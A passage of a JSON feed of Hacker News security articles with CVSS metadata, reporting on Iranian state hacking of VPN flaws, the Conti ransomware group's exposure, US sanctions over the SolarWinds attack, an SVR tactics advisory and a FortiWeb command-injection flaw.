are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND>)\n\nThe clearnet and dark web payment portals operated by the [Conti](<https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html>) ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public.\n\nAccording to [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1461450607311605766>), \"while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down.\"\n\nIt's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT [offered](<https://www.prodaft.com/resource/detail/conti-ransomware-group-depth-analysis>) an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims.\n\nThe result? Three members of the Conti team have been identified so far, each playing the roles of admin (\"Tokyo\"), assistant (\"it_work_support@xmpp[.]jp\"), and recruiter (\"IT_Work\") to attract new affiliates into their network.\n\nWhile ransomware attacks work by encrypting the victims' sensitive information and rendering it inaccessible, threat actors have increasingly latched on to a two-pronged strategy called double extortion to demand a ransom payment for decrypting the data and threaten to publicly publish the stolen information if the payment is not received within a specific deadline.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX>)\n\n\"Conti customers \u2013 affiliate threat actors \u2013 use [a digital] management panel to create new ransomware samples, manage their victims, and collect data on their attacks,\" noted the researchers, detailing the syndicate's attack kill chain leveraging PrintNightmare ([CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>), [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), and [CVE-2021-36958](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>)) and FortiGate ([CVE-2018-13374](<https://nvd.nist.gov/vuln/detail/CVE-2018-13374>) and [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)) vulnerabilities to compromise unpatched systems.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg>)\n\nEmerging on the cybercrime landscape in October 2019, Conti is believed to be the work of a Russia-based threat group called [Wizard Spider](<https://malpedia.caad.fkie.fraunhofer.de/actor/wizard_spider>), which is also the operator of the infamous [TrickBot](<https://thehackernews.com/2021/11/trickbot-operators-partner-with-shatak.html>) banking malware. Since then, at least 567 different companies have had their business-critical data exposed on the victim shaming site, with the ransomware cartel receiving over 500 bitcoin ($25.5 million) in payments since July 2021.\n\nWhat's more, an analysis of ransomware samples and the bitcoin wallet addresses utilized for receiving the payments has revealed a connection between Conti and Ryuk, with both families heavily banking on TrickBot, Emotet, and BazarLoader for actually [delivering the file-encrypting payloads](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) onto victim's networks via email phishing and other social engineering schemes.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5>)\n\nPRODAFT said it was also able to gain access to the group's recovery service and an admin management panel hosted as a Tor hidden service on an Onion domain, revealing extensive details of a clearnet website called \"contirecovery[.]ws\" that contains instructions for purchasing decryption keys from the affiliates. Interestingly, an investigation into Conti's ransomware negotiation process [published](<https://team-cymru.com/blog/2021/10/05/collaborative-research-on-the-conti-ransomware-group/>) by Team Cymru last month highlighted a similar open web URL named \"contirecovery[.]info.\"\n\n\"In order to tackle the complex challenge of disrupting cybercriminal organizations, public and private forces need to work collaboratively with one another to better understand and mitigate the wider legal and commercial impact of the threat,\" the researchers said.\n\n**_Update:_** The Conti ransomware's payment [portals](<https://twitter.com/VK_Intel/status/1461810216241086467>) are back up and running, more than 24 hours after they were first taken down in response to a report that identified the real IP address of one of its recovery (aka payment) servers \u2014 217.12.204[.]135 \u2014 thereby effectively bolstering its security measures.\n\n\"Looks like Europeans have also decided to abandon their manners and go full-gansta simply trying to break our systems,\"the gang said in a statement posted on their blog, effectively confirming PRODAFT's findings, but characterizing the details as \"simply disinformation,\" and that \"the reported 25kk which we 'made since July' is straight-up BS - we've made around 300kk at least.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T06:50:00", "type": "thn", "title": "Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13374", "CVE-2018-13379", "CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-11-20T15:13:21", "id": "THN:F35E41E26872B23A7F620C6D8F7E2334", "href": "https://thehackernews.com/2021/11/experts-expose-secrets-of-conti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the 